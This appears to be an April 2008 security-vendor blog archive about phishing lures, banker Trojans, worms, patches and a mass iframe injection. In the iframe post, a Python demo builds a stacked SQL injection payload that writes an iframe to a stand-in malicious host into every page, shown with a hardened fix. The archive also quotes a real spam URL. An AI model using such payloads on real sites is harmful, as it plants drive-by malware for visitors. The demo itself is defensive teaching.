Archive for April, 2008

Looks can be deceiving

April 30, 2008

We have recently detected another spam message that contains a malicious URL. That is nothing new, but what if the message appears to come from a trusted source, such as a security company?

That is the case with a spam message that uses our free online analysis tool, Activescan, as bait to deceive users.

The following image shows the fake message the user receives. It carries our company logo, but the link to the "analysis tool" points to a malicious URL, not to Panda's.

If the link is followed, a file called ScanActive.zip is downloaded, as shown in the image below:

This file is not our online analysis tool at all but a banker Trojan of the Banbra family, specifically Banbra.FRJ, which is designed to steal credentials for certain Brazilian banking entities.

IFRAMES Attack !!! (Update II)

April 28, 2008

The first thing we observed when we analysed the attack, which planted an iframe pointing to a malicious website in hundreds of thousands of web pages, was that all the compromised websites were hosted on servers running IIS and MSSQL. Initially, the most likely hypothesis was that a known exploit for one of these platforms was being used.

However, a deeper analysis showed that the cause was not a vulnerability in IIS or MSSQL Server but badly programmed ASP code, which is what compromised the websites hosted on these IIS servers with MSSQL.

The ASP code shown below ("orderitem.asp") passes user-supplied input straight into MSSQL queries, which allows SQL injection: the attacker can insert data into the database, and that is how the iframe ended up in the hosted websites.

For security reasons, the full ASP code has not been included.
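As an added illustration (not the site's ASP code, which the post withholds), the following Python script emulates the orderitem.asp flaw: the vulnerable handler pastes the query-string value into the SQL text, the hardened handler validates and binds it, and a triage query lists the pages whose stored content now carries an iframe. The table layout, the "id" parameter and the iframe URL are assumptions chosen for the demonstration; sqlite3's executescript() stands in for an MSSQL batch, which likewise executes every stacked statement the client sends.

```python
import sqlite3

# Constructed data: the iframe an attacker would want on every page.
INJECTED_IFRAME = '<iframe src="http://malicious.example/in.cgi?3" width="0" height="0"></iframe>'


def make_site_db():
    """Create an in-memory pages table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (id, title, body) VALUES (?, ?, ?)",
        [(1, "Home", "<p>Welcome</p>"),
         (2, "Order item 2", "<p>Blue widget</p>"),
         (3, "Contact", "<p>Mail us</p>")],
    )
    conn.commit()
    return conn


def orderitem_vulnerable(conn, item_id):
    """The flawed pattern: the query-string value is pasted into the SQL text.

    A classic-ASP page does the same with Request.QueryString("id") and sends
    the string to MSSQL as one batch. sqlite3's executescript() also runs a
    multi-statement batch, so a value such as
        2; UPDATE pages SET body = body || '<iframe ...>'; --
    executes the intended SELECT and then the attacker's UPDATE against
    every row of the table. (MSSQL concatenates with +, SQLite with ||.)
    """
    sql = "SELECT title, body FROM pages WHERE id = " + item_id
    conn.executescript(sql)  # every stacked statement runs
    conn.commit()


def orderitem_hardened(conn, item_id):
    """Validate the type, then bind the value; input never becomes SQL text."""
    if not item_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(item_id),)
    ).fetchall()


def page_body(conn, page_id):
    """What the site would serve for a given page id (None if absent)."""
    row = conn.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def injected_pages(conn):
    """Triage query: ids of every page whose stored content carries an iframe."""
    rows = conn.execute("SELECT id FROM pages WHERE body LIKE '%<iframe%' ORDER BY id")
    return [r[0] for r in rows]


if __name__ == "__main__":
    payload = "2; UPDATE pages SET body = body || '" + INJECTED_IFRAME + "'; --"

    db = make_site_db()
    orderitem_vulnerable(db, payload)
    print("pages carrying the iframe after injection:", injected_pages(db))

    db = make_site_db()
    try:
        orderitem_hardened(db, payload)
    except ValueError as exc:
        print("hardened handler rejected the request:", exc)
    print("pages carrying the iframe:", injected_pages(db))
```

The triage query is the quickest way to size a compromise like this one on a real site: run it against every text column that ends up in served HTML, not just a single body column.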

IFRAMES Attack !!! (Update)

April 25, 2008

This graph shows an example of the infection chain, from the moment a user visits a legitimate website that has been modified until the infection, if the exploit succeeds, takes effect.

Thanks to Oscar and Olaiz for their collaboration.

IFRAMES Attack !!!

April 24, 2008

Nowadays it is usually taken for granted that we can only get infected by visiting malicious websites or running files from untrustworthy sources. However, we have lately detected several cases in which, by exploiting vulnerabilities on the web servers, malicious code is introduced into the websites hosted on them.

Therefore, we might come across trustworthy websites that contain malicious code introduced by a cyber-crook.

The following is one piece of code we found introduced into certain websites:

Iframe

So far, approximately 282,000 websites contain this piece of code.

This injected element, an iframe, is HTML that the browser interprets: it silently loads the page it points to, which can redirect the browser again or push a malicious file down to it.

The instructions it contains are the following:

In this particular case, the user is redirected transparently to a URL that probes the browser for certain unpatched vulnerabilities. If one is found, the exploit installs malware on the computer.

These are some of the vulnerabilities exploited to install malware in our computer:

MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution

MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution

MS07-018 Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution

MS07-033 Cumulative Security Update for Internet Explorer

MS07-055 Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution

This means that even while browsing only reputable websites, we can land on a legitimate page whose code has been modified to infect our computer.

That is why we recommend keeping your operating system fully patched.

Kiss me!!!

April 16, 2008

Several years ago, the main aim of cyber-crooks was to achieve notoriety with their creations, that is, to be famous. To do so, they wanted to attract as much attention as possible, and causing massive epidemics was their springboard to fame.

Their motivation has changed and is now purely economic. The best way to make money is to carry out malicious actions as stealthily as possible, and hiding malware with rootkits has become a usual technique, as in the well-known Storm Worm family.

This trend has turned malware creation into a very lucrative business.

However, we still come across samples as eye-catching as W32/MSNworm.EI.worm, which spreads via MSN Messenger and displays a funny picture of a little pig blowing us a kiss while it infects our computer:

Microsoft Updates for April

April 9, 2008

Five critical and three important updates have been released (from MS08-018 to MS08-025). It's time to start updating your system if you haven't done it yet.

Critical updates affect these components: Microsoft Project, GDI, the VBScript and JScript scripting engines, ActiveX kill bits and Internet Explorer. The important updates patch the DNS Client, the Windows kernel and Microsoft Visio.

Most of them allow remote code execution, so don't forget to update your system asap.

You can find more information about the security bulletins in the Microsoft Security Bulletin Summary for April 2008 (MS08-April).

You are nominated…to distribute malware!!! (II)

April 4, 2008

Big Brother Brasil again. I am not very fond of this type of program, but spammers have made me pay attention to it.

We wondered which participant would be the next one selected to distribute malware. We thought they would pick one of the finalists; however, this time the candidate has been a female participant called “Juliana”, who had already been evicted from the house.

These spam messages, which link to malicious websites, have subjects such as “Juliana do BBB do modo como você queria ver.” or “Chegou um Vivo FotoTorpedo para voce !!!”, and invite us to view a video or photos of this participant. When the link in the message (http://www.gallimard-jeunesse.fr/%5BRemoved%5D/visualizer/Visualizar.php) is followed, we are redirected to a web page from which the malware detected as Trj/Banbra.FPJ is downloaded:

This Trojan is designed to obtain the affected users’ access keys to several banking entities.

P.S: If you feel curious to know who the winner of Big Brother Brasil 2008 was, it was Rafhina.

April Fools' Day malware

April 1, 2008

Social engineering never ends. Today is April Fools' Day, and we have received a spam message with a link, similar to the ones we saw on Saint Valentine's Day. Some of the subjects seen so far:

– Today's Joke!
– Happy All Fools!
– Gotcha! April Fool!
– Happy April Fool's Day.
– All Fools' Day
– Surprise! The joke's on you.

This is what you see when you go to the site:

April Fool's Day malware

We have seen different file names being downloaded, such as kickme.exe, foolsday.exe or funny.exe, but it is the same file; only the name changes. We are detecting this malware as W32/Nuwar.SK.worm. Be careful, and as always, never trust this kind of message.

Quarterly Report January-March 2008

April 1, 2008

We have just published the latest PandaLabs Quarterly Report. There, you can find statistics and information about the current situation of malware as well as different sections analyzing the most interesting events of the first quarter.

Regarding malware, Trojans continue being the most relevant category of malware, at 62.16%.

The well-known Storm Worm attack, which infected thousands of computers worldwide, is still active. It is therefore worth a closer look, and we have prepared a section recalling the most significant dates of its spread and the social engineering techniques it used.

We also take a look at some of the tools malware creators use to check that their creations go undetected.

Nowadays the use of Web 2.0 services is widespread, with social networks among the most popular. The larger and more active a social network is, the greater the chances of malware spreading across it and reaching a high infection rate.

Finally, you will find an interesting article about mobile threats, with Symbian as the target platform for malware creators.

You can download it in English or in Spanish.

Enjoy it!